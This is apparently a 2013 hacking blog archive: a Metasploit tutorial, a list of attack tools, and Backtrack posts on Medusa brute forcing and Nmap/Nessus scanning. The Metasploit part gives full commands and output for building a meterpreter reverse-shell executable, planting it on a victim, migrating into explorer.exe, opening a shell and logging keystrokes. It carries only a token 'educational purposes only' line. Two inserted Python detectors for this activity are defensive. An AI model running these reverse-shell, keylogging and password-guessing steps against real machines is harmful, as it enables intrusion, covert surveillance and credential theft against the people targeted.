
Friday, October 18, 2013

Katana | A portable multi-boot security suite


Katana is a tool which holds over 100 applications that can be run from a USB flash drive. The new v2 has come up with a major addition called "Forge", which helps in adding further applications to the boot list.

>>>>> Learn how to use portable applications from your PC.

Portable Applications:

1. BackTrack
2. Computer Aided Investigative Environment (CAINE)
3. Ultimate Boot CD for Windows
4. Ophcrack Live

and many more... Find more portable applications here. :)

(Download)

Metasploit Tutorial - With an example | Exploiting the vulnerabilities

--- The Metasploit Framework ---

Note: This is an advanced topic. Read carefully. Feel free to ask any kind of query; we are always here to help you.

If you are really interested in network security, chances are you have heard of Metasploit over the last few years.

Now, have you ever wondered what someone can do to your PC just by knowing your IP? Here's the answer. He could 0wN you, or in other words, he could have full access to your PC, provided you have just a few security loopholes, which may arise from something as simple as not updating your Flash Player last week when it prompted you to do so.

Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking.

The topic of Metasploit is very vast in itself. However, I'll try to keep it basic and simple so that everyone here can understand it. Also, Metasploit can be used with several other tools such as Nmap or Nessus (all of these tools are present in Backtrack).

In this tutorial, I'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.

Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.







Before I go into the details of The Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them).

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.

Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or a DoS attack on the target.

Overflow: An error caused when a program tries to store data beyond the size of its buffer. It may be used by an attacker to execute malicious code.

Payload: The actual code which runs on the compromised system after exploitation.

Now, what IS Metasploit?

It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, and it can also be used to write our own 0-day exploits.









METASPLOIT ANTI FORENSICS:

Metasploit has a great collection of tools for anti-forensics, making the forensic analysis of the compromised computer a little more difficult. They are released as a part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.

Metasploit comes in the following versions:

1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI

I would recommend using the MSF Console because of its effectiveness and power from a pentester's point of view. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.

I would recommend doing the following things in Metasploit on a Backtrack system or image, avoiding the Windows version of the tool.

For those of you who don't know, Backtrack is a Linux distro especially for security professionals, including all the tools required by a pentester.

Download Backtrack from here. You can download the ISO or the VMware image, whichever you're comfortable with. If you have physical access to more than one system, go for the ISO image and install it on your hard disk.


Let the Hacking Begin:

Open up Backtrack. You should have a screen similar to this.

The default login credentials are:

Username: root
Pass: toor

Type in

root@bt:~# /etc/init.d/wicd start

to start the wicd network manager.

Finally, type "startx" to start the GUI mode:

root@bt:~# startx












First of all, know your local IP. Open up a konsole (on the bottom left of the taskbar) and type in:

root@bt:~# ifconfig

It would be something like 192.168.x.x or 10.x.x.x.

Make a note of it.

Now, launch msfconsole by going to Applications >> Backtrack >> Metasploit Engineering Framework >> Framework Version 3 >> msfconsole









You should now have a shell, something similar to a command prompt in Windows.

msf >

Let's now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window ("Session >> New Shell", or click on the small icon on the left of the shell tab in the bottom left corner of the window) and run:

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST="your local ip" LPORT="any port you wish" X > /root/reverse_tcp.exe

Your local IP is the one you noted earlier, and for the port you could select 4444.

(Everything has to be entered without quotes.)

You should get something like this:

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#

Also, you would now see a reverse_tcp.exe file on your Backtrack desktop.









Copy it to your other computer on the same local network using a thumb drive or by uploading it online.
















Now open the 1st shell window with msfconsole in it.

msf >

Type the following:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you.

And now you have set the meterpreter handler to listen on port 4444.

The last step you have to do now is to type in "exploit" and press enter:

msf exploit(handler) > exploit









[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...

Now the handler is listening for all incoming connections on port 4444. Once the executable runs on the victim, the handler sends it the rest of the payload (the stage) and a session opens:

[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this:


meterpreter >


Type in ps to list the active processes:

meterpreter > ps

Search for explorer.exe and migrate to that process (5716 is its PID in this example):

meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following to load the priv extension:

meterpreter > use priv

Now, if you want to start the keylogger on the victim, just type keyscan_start.









Now, if you want a shell on the victim's computer, just type shell:

meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

You would now have a command prompt. Type in whoami to see the victim's computer and user name:

C:\Windows\system32>whoami
whoami
win7-pc\win 7

C:\Windows\system32>









Let's suppose you want to start a notepad on the victim's computer.

Type in:

Let's say the victim has typed something on his computer.

Just type exit to return to meterpreter.

Now type in keyscan_dump to see all the typed keystrokes:

meterpreter > keyscan_dump
Dumping captured keystrokes...

GaM3 0V3R

P.S.: The above information is for educational purposes only. You should test it only against a computer you own.
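From the defender's side, the session above leaves a recognisable trace on the victim host: a user-launched binary (reverse_tcp.exe) connects out to an uncommon port (4444), and then injects into explorer.exe when migrate runs. The following Python is an added example, not part of the original post; the Sysmon-style events, paths and PIDs are constructed for illustration.

```python
from datetime import datetime, timedelta

# Ports the page's "common ports" table treats as ordinary services; a user
# binary dialling out to anything else deserves a second look.
COMMON_PORTS = {20, 21, 22, 23, 25, 53, 80, 443}

# Constructed Sysmon-style records (Event ID 3 = network connection,
# Event ID 8 = CreateRemoteThread). Field names follow Sysmon's schema; the
# values, paths and PIDs are made up for this example.
EVENTS = [
    {"EventID": 3, "UtcTime": "2011-03-13 15:32:10",
     "Image": r"C:\Users\win 7\Desktop\reverse_tcp.exe", "ProcessId": 4120,
     "DestinationIp": "192.168.255.130", "DestinationPort": 4444},
    {"EventID": 3, "UtcTime": "2011-03-13 15:32:11",
     "Image": r"C:\Program Files\Internet Explorer\iexplore.exe", "ProcessId": 3020,
     "DestinationIp": "93.184.216.34", "DestinationPort": 443},
    {"EventID": 8, "UtcTime": "2011-03-13 15:33:40",
     "SourceImage": r"C:\Users\win 7\Desktop\reverse_tcp.exe", "SourceProcessId": 4120,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 5716},
    {"EventID": 8, "UtcTime": "2011-03-13 15:40:00",
     "SourceImage": r"C:\Windows\System32\csrss.exe", "SourceProcessId": 500,
     "TargetImage": r"C:\Windows\explorer.exe", "TargetProcessId": 5716},
]


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")


def uncommon_outbound(events):
    """Event ID 3 records whose destination port is not a common service port,
    keyed by (pid, image) so later events from the same process can be matched."""
    found = {}
    for ev in events:
        if ev["EventID"] == 3 and ev["DestinationPort"] not in COMMON_PORTS:
            found[(ev["ProcessId"], ev["Image"])] = ev
    return found


def migration_alerts(events, window=timedelta(minutes=10)):
    """Alert when a process that already holds an uncommon outbound connection
    creates a remote thread in another process within `window`. That sequence
    is what a reverse_tcp stage followed by `migrate` looks like on the host."""
    conns = uncommon_outbound(events)
    alerts = []
    for ev in events:
        if ev["EventID"] != 8:
            continue
        conn = conns.get((ev["SourceProcessId"], ev["SourceImage"]))
        if conn is None:
            continue  # injector never made a suspicious connection
        gap = parse_time(ev["UtcTime"]) - parse_time(conn["UtcTime"])
        if timedelta(0) <= gap <= window:
            alerts.append({
                "source": ev["SourceImage"],
                "target": ev["TargetImage"],
                "remote": f'{conn["DestinationIp"]}:{conn["DestinationPort"]}',
                "seconds_after_connect": int(gap.total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for a in migration_alerts(EVENTS):
        print(f'{a["source"]} -> {a["target"]} after connecting to '
              f'{a["remote"]} ({a["seconds_after_connect"]}s earlier)')
```

The csrss.exe record shows why the correlation matters: a remote thread into explorer.exe on its own is noisy, but one created by a process that just opened a connection to port 4444 is not.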

Backtrack Hacking Video Tutorials

These are amazing video tutorials for Backtrack which include a very good collection of hacking videos using Backtrack, such as SQL injection, phone phreaking, wireless hacking, website hacking, network hacking and more. Below is the complete list of videos included in the DVD.

Videos Included In The DVD

  • Episode 1 – Network Hacking – Arp Poisoning
  • Episode 2 – Wireless Hacking – Cracking WEP
  • Episode 3 – Wireless Hacking – DeAuth
  • Episode 5 – Lock Picking – Bump Key
  • Episode 6 – Phone Phreaking – Beige Box
  • Episode 7 – Phone Phreaking/Network Hacking – Sniffing VOIP
  • Episode 8 – Lock Picking – DIY Padlock Shims
  • Episode 9 – Multi-Disc Combo Locks
  • Episode 10 – Hacking Basics – MD5
  • Episode 11 – Website Hacking – Sql Injection
  • Episode 12 – Hacking Basics – Backtrack
  • Episode 13 – Website Hacking – XSS
  • Episode 14 – Staying Secure – SSH Tunnel
  • Episode 15 – Modding – Xbox Softmod
  • Episode 16 – Wireless Hacking – Cracking WPA
  • Episode 17 – Triple Boot – Windows, Backtrack, & Ubuntu
  • Episode 18 – Local Password Cracking
  • Episode 19 – Lock Picking Basics
  • Episode 20 – Ettercap
  • Episode 21 – XSS Tunnel
  • Episode 22 – Playstation 2 Softmod
  • Episode 23 – Cracking WEP Update
  • Episode 24 – Bypass Hotspot’s Access Controls


  • Underground – Install Backtrack 3 on USB
  • Underground – CSRF(Cross Site Request Forgery)
  • Underground – Alternate Data Streams
  • Underground – Local File Inclusion
  • Underground – Windows Privilege Escalation
  • Underground – Bluetooth Hacking
  • Underground – VMWare
  • Underground – Fix Google Mail Enumerator
  • Underground – Home Made Lock Picks
  • Underground – Downfalls of Anti-Virus Software Part 2
  • Underground – Downfalls of Anti-Virus Software
  • Underground – Evilgrade
  • Underground – Trojan Basics
  • Underground – Manipulating Windows User ***s
  • Underground – Combine Files
  • Underground – Password Phishing
  • Underground – Windows SMB Relay Exploit
  • Underground – Application Patching
  • Underground – Metasploit Autopwn
  • Underground – Email Spoofing
  • Underground – Introduction
  • Extracting Database Information from Information_Schema
  • FPGA MD5 Cracker
  • Arduino ARP Cop
  • Email Injection
  • Ping of Death
  • DNS Spoofing with Virtual Hosts
  • Bypass Cisco Clean Access & Cisco NAC Appliance
  • Dual Boot – Windows & Backtrack
  • Sql Injection Challenge How-to
  • How to use Intel Pro/Wireless 3945ABG in Backtrack 2
  • Local Privilege Escalation Vulnerability in Cisco VPN Client


Sunday, October 6, 2013

TOP 15 HACKING/CRACKING TOOLS 2013

1. PWN STAR

A bash script to launch a soft access point (AP), which can be configured with a variety of attack options, including a PHP script and a server index.html for phishing. It can act as a multi-client captive portal using PHP and iptables, and includes exploitation classics such as crime-PDF, de-auth with aireplay, etc.

[Image: PwnSTARscreenshot.png]

General Features:
Managing interfaces and MAC spoofing
Setting up sniffing
Web phishing
Karmetasploit
WPA handshake capture
De-auth clients
Managing iptables


Download Pwn-Star Here

2. ZED ATTACK PROXY (ZAP)

ZAP is an integrated penetration testing tool for finding vulnerabilities in web applications. It is designed for use by people with a wide range of security experience, and as such is ideal for developers and functional testers who are new to penetration testing, as well as being a useful addition to an experienced pentester's toolbox.

[Image: zap1-3historyfilter.jpg]

Key Features:
Intercepting proxy
Active scanner
Passive scanner
Brute force scanner
Spider
Fuzzer
Port scanner
Dynamic SSL certificates
API
BeanShell integration


Download ZAP Here

3. SET (SOCIAL ENGINEERING TOOLKIT)

A toolkit that focuses on attacking the human element: weakness and inadvertence. This tool is widely used today and is one of the most successful tools demonstrated at Defcon.

[Image: Set-Box_2.png]

Key Features:
Spear-Phishing Attack Vector
Java Applet Attack Vector
Metasploit Browser Exploit Method
Credential Harvester Attack Method
Tabnabbing Attack Method
Man Left in the Middle Attack Method
Web Jacking Attack Method
Multi-Attack Web Vector
Infectious Media Generator
Teensy USB HID Attack Vector


Download SET Here


4. BURP SUITE

Burp Suite is a very nice tool for web application security testing. It is great for pentesters and security researchers. It contains a variety of tools with many interfaces between them, designed to facilitate and accelerate the process of attacking web applications.

[Image: scanner.png]

General Function:
Intercepting proxy
Spider (crawler)
Web application scanner
Attack tool (Intruder)
Repeater and Sequencer tools


Download Burp Suite Here

5. ETTERCAP

Ettercap is a multipurpose sniffer/interceptor/logger for local area networks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.

[Image: Ettercap_2.jpg]

General Function:
Capture traffic and data
Log network traffic
Etc.


Download Ettercap Here

6. SANS INVESTIGATIVE FORENSIC TOOLKIT (SIFT)

The SANS Investigative Forensic Toolkit (SIFT) Workstation is a VMware appliance pre-configured with all the requirements to perform a detailed digital forensic examination. It is compatible with Expert Witness Format (E01), Advanced Forensic Format (AFF), and raw (dd) evidence formats. The new version has been completely rebuilt on an Ubuntu base with many additional tools and capabilities used in modern forensic work.

[Image: SANS+Investigative+Forensic+Toolkit+2.14+Released.jpg]

General Function:
iPhone, Blackberry, and Android forensic capabilities
Registry viewer (YARU)
Compatibility with F-Response Tactical, Standard, and Enterprise
PTK 2.0 (special release - not available for download)
Automated timeline generation via log2timeline
Many Firefox investigative tools
Windows Journal Parser and Shellbags Parser (jp and sbag)
Many Windows analysis utilities (prefetch, usbstor, event logs, and more)
Complete overhaul of RegRipper plugins (added over 80 additional plugins)


Download SIFT Here


7. WIRESHARK

Wireshark is the world's most widely used and most popular protocol analyzer, and is the de facto standard across many industries and educational institutions for analyzing networks at the level of individual protocols.

[Image: ws-main.png]

General Function:
Live capture and offline analysis
Standard three-pane packet browser
Multi-platform: runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
Captured network data can be browsed via a GUI, or via the TTY-mode tshark utility
The most powerful display filters in the industry
Rich VoIP analysis
Read/write many different capture file formats
Etc.


Download wireshark Here


8. WEBSPLOIT

WebSploit is an open source project for remote scanning and analysis of weaknesses in web applications.

[Image: WebSploit+Framework+2.0.3+with+Wifi+Jammer.jpg]

Key Features:
[>] Social engineering
[>] Scan, web crawler & analysis
[>] Automatic exploiter
[>] Support for network attacks
-
[+] Autopwn - used from Metasploit to scan and exploit target services
[+] WMAP - scan and crawl a target using the Metasploit WMAP plugin
[+] Format infector - inject the payload into reverse and bind file formats
[+] phpMyAdmin scanner
[+] LFI bypasser
[+] Apache users scanner
[+] Dir bruter
[+] Admin finder
[+] MLITM attack - Man Left In The Middle, XSS phishing attacks
[+] MITM - Man In The Middle attack
[+] Java applet attack
[+] MFOD attack vector
[+] USB infection attack
[+] DoS ARP attack
[+] 's Killer attack
[+] Fake update attack
[+] Fake access point attack



Download Websploit Framework Here

9. WINAUTOPWN

WinAutoPWN is a tool used to exploit Windows directly, so that we automatically become an administrator on the Windows machine.

[Image: winAUTOPWN+v3.2+Released.jpg]


Download WinAutoPWN Here


10. HASHCAT

Hashcat is a family of tools for cracking password hashes; it is very powerful for password recovery.

[Image: hashcat.png]

General Function:
Multi-threaded
Free
Multi-hash (up to 24 million hashes)
Multi-OS (Linux, Windows and OSX native binaries)
Multi-algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...)
SSE2 accelerated
All attack modes except brute-force and permutation can be extended by rules
Very fast rule engine
Rules compatible with JTR and PasswordsPro
Possible to resume or limit a session
Automatically recognizes recovered hashes from the outfile at startup
Can automatically generate random rules
Load a salt list from an external file and use it in a brute-force attack variant
Able to work in a distributed environment
Specify multiple wordlists or multiple directories of wordlists
Number of threads can be configured
Threads run at the lowest priority
30+ algorithms implemented with performance in mind
... and much more


Download HashCat Here

11. UNISCAN

Uniscan is a scanner for web applications, written in Perl for Linux. The current Uniscan version is 6.2.

[Image: uniscan.png]

General Function:
Identification of system pages through a web crawler.
Use of threads in the crawler.
Control of the maximum number of crawler requests.
Control of variation of system pages identified by the web crawler.
Control of file extensions that are ignored.
Test of pages found via the GET method.
Test of forms found via the POST method.
Support for SSL requests (HTTPS).
Proxy support.
Generate site list using Google.
Generate site list using Bing.
Plug-in support for the crawler.
Plug-in support for dynamic tests.
Plug-in support for static tests.
Plug-in support for stress tests.
Multi-language support.
Web client.


Download Uniscan Here


12. OLLYDBG

OllyDbg is a 32-bit assembler-level debugger for Microsoft Windows. Its emphasis on binary code analysis makes it particularly useful in cases where source code is not available.

[Image: cracking-dengan-ollydbg.jpg?d8e507]

General Function:
Intuitive user interface, no cryptic commands
Code analysis - traces registers, recognizes procedures, loops, API calls, switches, tables, constants and strings
Directly loads and debugs DLLs
Object file scanning - locates routines from object files and libraries
Allows for user-defined labels, comments and function descriptions
Understands debugging information in Borland ® format
Saves patches between sessions, writes them back to the executable file and updates fixups
Open architecture - many third-party plugins are available
No installation - no trash in the registry or system directories
Debugs multithreaded applications
Attaches to running programs
Configurable disassembler, supports both MASM and IDEAL formats
MMX, 3DNow! and SSE instructions and data types, including Athlon extensions
Full UNICODE support
Dynamically recognizes ASCII and UNICODE strings - also in Delphi format!
Recognizes complex code constructs, like a call to a jump to a procedure
Decodes calls to more than 1900 standard API and 400 C functions
Gives context-sensitive help on API functions from an external help file
Sets conditional, logging, memory and hardware breakpoints
Traces program execution, logs arguments of known functions
Shows fixups
Dynamically traces stack frames
Searches for imprecise commands and masked binary sequences
Searches whole allocated memory
Finds references to a constant or address range
Examines and modifies memory, sets breakpoints and pauses the program on-the-fly
Assembles commands into the shortest binary form
Starts from a floppy disk



Download OllyDbg Here


13. BBQSQL

BBQSQL is an open source SQL injection framework specifically designed to be hyper fast, database agnostic, easy to set up, and easy to modify. It is another amazing release from Arsenal at Black Hat USA 2012. When conducting security assessments of applications, we often find that SQL injection vulnerabilities are difficult to exploit; with this tool it becomes extremely easy.
BBQSQL is written in Python. It is very useful when attacking complex SQL injection vulnerabilities. BBQSQL is also a semi-automated tool, which allows customization for those who are finding it difficult to trigger a SQL injection. The tool is built to be database agnostic and very versatile. It also has an intuitive UI that makes setting up the attack much easier.



[Image: BBQSQL.jpg]


General Function:
SQL Injection Tools
URL
HTTP Method
Headers
Cookies
Encoding methods
Redirect behavior
Files
HTTP Auth
Proxies


Download BBQSQL Here


14. CRYPTOHAZE

Cryptohaze is a set of tools to crack passwords/hashes; it supports CUDA, OpenCL, and CPU code (SSE, AVX, etc.) and can run on any OS that supports CUDA. It is intended to make hash cracking easier for pentesters.



[Image: Hacker+going+to+demonstrate+open+source+...er+sec.png]


General Function:
Crack various kinds of hash
Showing results from crackhash
Cracking on various OS platforms



Download Cryptohaze Here


15. SAMURAI WEB TESTING FRAMEWORK (SWTF)

SWTF is used for testing/pentesting web applications: finding weaknesses and exploiting them.

[Image: The+Samurai+Web+Testing+Framework+v+2.0RC5.jpg]

General Function:
Web Scanner
Web Mapping
Web Exploitation



Download SWTF Here


So that's it. Enjoy!

Saturday, October 5, 2013

Backtrack 5 : Exploitation

Medusa

Medusa is a login brute forcer that attempts to gain access to remote services by guessing the user's password. Medusa is capable of attacking a large number of remote services including FTP, HTTP, MySQL, Telnet, VNC, web forms, and more. In order to use Medusa, you need several pieces of information: the target IP address, a username or username list that you are attempting to log in as, a password or dictionary file containing multiple passwords to try, and the name of the service you are attempting to authenticate with.
Medusa comes installed on Backtrack 5. However, if you are using a different version of Backtrack without Medusa, type:
apt-get update
apt-get install medusa
When using online password crackers, the potential for success can be greatly increased if you combine this attack with information gathered from reconnaissance and scanning, for example usernames, passwords, and email addresses you have found. Programs like Medusa will take a username and a password list and keep guessing until they have used all the passwords. Be aware that some remote access systems employ a password throttling technique that limits the number of unsuccessful logins you are allowed. Your IP address can be blocked or the username can be locked out if you enter too many incorrect guesses.
Backtrack includes a few word lists that you can use for your brute forcing adventures. You can find one list at:
/pentest/passwords/wordlists/
[Image: Backtrack Tutorials: Password List]
In order to execute the brute-force attack, you open a terminal and type the following:
medusa -h target_ip -u username -P path_to_password_dictionary -M service_to_attack
"-h" is used to specify the IP address of the target host. "-u" is used for a single username that Medusa will use to attempt logins. "-P" is used to specify an entire list containing multiple passwords and needs to be followed by the actual location or path to the dictionary file. The "-M" switch is used to specify which service we want to attack.
[Image: Backtrack Tutorials: Medusa attack]
Here I launch an attack against my own SSH server.
More to come!
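On the receiving end, a Medusa run against sshd shows up in auth.log as a burst of "Failed password" lines from one source, which is exactly what the throttling mentioned above keys on. This Python is an added example, not part of the original post; it flags that burst and records whether a success followed it. The log lines and thresholds are constructed for the example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# One regex for the two OpenSSH password-auth outcomes we care about.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2$"
)

# Constructed auth.log excerpt: six guesses in six seconds from one host, then
# a success; a second host with one ordinary typo. Not captured output.
AUTH_LOG = """\
Oct  5 10:01:01 bt sshd[2201]: Failed password for root from 192.168.56.102 port 40210 ssh2
Oct  5 10:01:02 bt sshd[2203]: Failed password for root from 192.168.56.102 port 40211 ssh2
Oct  5 10:01:03 bt sshd[2205]: Failed password for root from 192.168.56.102 port 40212 ssh2
Oct  5 10:01:04 bt sshd[2207]: Failed password for invalid user admin from 192.168.56.102 port 40213 ssh2
Oct  5 10:01:05 bt sshd[2209]: Failed password for root from 192.168.56.102 port 40214 ssh2
Oct  5 10:01:06 bt sshd[2211]: Failed password for root from 192.168.56.102 port 40215 ssh2
Oct  5 10:01:07 bt sshd[2213]: Accepted password for root from 192.168.56.102 port 40216 ssh2
Oct  5 10:05:00 bt sshd[2300]: Failed password for alice from 10.0.2.20 port 50001 ssh2
Oct  5 10:05:09 bt sshd[2302]: Accepted password for alice from 10.0.2.20 port 50002 ssh2
"""


def parse_auth(text):
    """Return (timestamp, source ip, user, failed) for each password-auth line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            events.append((ts, m["ip"], m["user"], m["result"] == "Failed"))
    return events


def detect_guessing(text, max_failures=5, window_s=60):
    """Flag sources with >= max_failures failed logins inside a window_s sliding
    window; remember the usernames tried and whether a success followed the
    burst (i.e. the password was guessed)."""
    recent = defaultdict(deque)  # ip -> timestamps of failures still in window
    attempted = defaultdict(set)  # ip -> every username it failed with
    flagged = {}
    for ts, ip, user, failed in parse_auth(text):
        if failed:
            attempted[ip].add(user)
            q = recent[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()  # drop failures older than the window
            if len(q) >= max_failures:
                entry = flagged.setdefault(
                    ip, {"peak_failures": 0, "users": attempted[ip],
                         "success_after_burst": False})
                entry["peak_failures"] = max(entry["peak_failures"], len(q))
        elif ip in flagged:
            flagged[ip]["success_after_burst"] = True
    return flagged


def block_list(flagged):
    """Sources a fail2ban-style throttling rule would lock out."""
    return sorted(flagged)


if __name__ == "__main__":
    for ip, info in detect_guessing(AUTH_LOG).items():
        print(ip, info["peak_failures"], sorted(info["users"]),
              "SUCCESS AFTER BURST" if info["success_after_burst"] else "")
```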

Backtrack 5 : Scanning

The scanning process can be divided into three steps:
  1. Determining if a system is active.
  2. Port scanning the system.
  3. Scanning the system for vulnerabilities.

Step 1 is the process of determining whether a target system is turned on and capable of communicating or interacting with our machine. This step is the least reliable, and we should always continue with steps 2 and 3 regardless of the outcome of this test. Regardless, it is still important to conduct this step and make a note of any machines that respond as alive.
Ports provide a way or location for software and networks to communicate with hardware like a computer. A port is a data connection that allows a computer to exchange information with other computers, software, or devices.

Common Ports and their Services

Port Number   Service
20            FTP data transfer
21            FTP control
22            SSH
23            Telnet
25            SMTP (e-mail)
53            DNS
80            HTTP
443           HTTPS

Pings and Ping Sweeps

A ping is a special type of network packet called an ICMP packet. Pings work by sending specific types of network traffic, called ICMP Echo Request packets, to a specific interface on a computer or network device. If the device (and the attached network card) that received the ping packet is turned on and not restricted from responding, the receiving machine will respond to the originating machine with an Echo Reply packet. Aside from telling us that a host is alive and accepting traffic, pings provide other valuable information, including the total time it took for the packet to travel to the target and return.
Pings also report traffic loss, which can be used to gauge the reliability of a network connection.
[Image: backtrack tutorials ping example]
Ping google.com with the count argument -c 4 to ping 4 times.
The simplest way to run a ping sweep is with a tool called FPing. FPing is built into Backtrack and is run from the terminal. The easiest way to run FPing is to open a terminal window and type the following:
fping -a -g 172.16.45.1 172.16.45.254 > hosts.txt
The "-a" argument is used to show only the live hosts in the output. This makes our final report much cleaner and easier to read. The "-g" is used to specify the range of IP addresses we want to sweep. You need to enter both the beginning and the ending IP addresses. In this example, we scanned all the IPs from 172.16.45.1 to 172.16.45.254. The ">" character is used to redirect the output to a file, and hosts.txt is the name of the file our results will be saved to.

Port Scanning

There are a total of 65,536 (0–65,535) ports on every computer. Ports can be either TCP or UDP, depending on the service using the port. We scan computers to see what ports are in use or "open". This gives us a better picture of the purpose of the machine, which in turn gives us a better idea of how to attack the box.

TCP 3-Way Handshake

Before we go on, we first have to know how computers on a network communicate with each other. When two computers want to communicate, they go through a process known as the 3-way handshake. The first computer, A, sends a synchronize (SYN) packet to the other computer, B. Then, if computer B is listening (has its port open), it responds to A with a synchronize-acknowledgement (SYN-ACK) packet. Finally, computer A sends an acknowledgement (ACK) packet to computer B, and the two computers communicate as usual.

Using Nmap

Nmap was written by Gordon Lyon, is available for free from www.insecure.org, and is built into today's Backtrack Linux 5.

When we conduct a port scan, Nmap will create a packet and send it to each designated port on the computer, just like the 3-way handshake. The goal is to determine what kind of a response we get from the target ports.
To use Nmap, open up the terminal and type:
nmap -p- 192.168.56.101
[Image: Backtrack Tutorials: Nmap Scan]
Here I scan a Windows XP machine on my network.
The "-p-" tells nmap to scan all ports on a target machine. The 10.0.2.15 is the local IP of the target machine.

Vulnerability Scanning

To scan systems for vulnerabilities, we will use a vulnerability scanner. There are several good scanners available, but we will be focusing on Nessus. To install Nessus, type:
root@bt:~# apt-get install nessus
Then, to access Nessus via the GUI, go to:
Applications -> Backtrack -> Vulnerability Assessment -> Vulnerability Scanner -> Nessus -> Nessus Start.
[Image: Backtrack Tutorials: Nessus Start]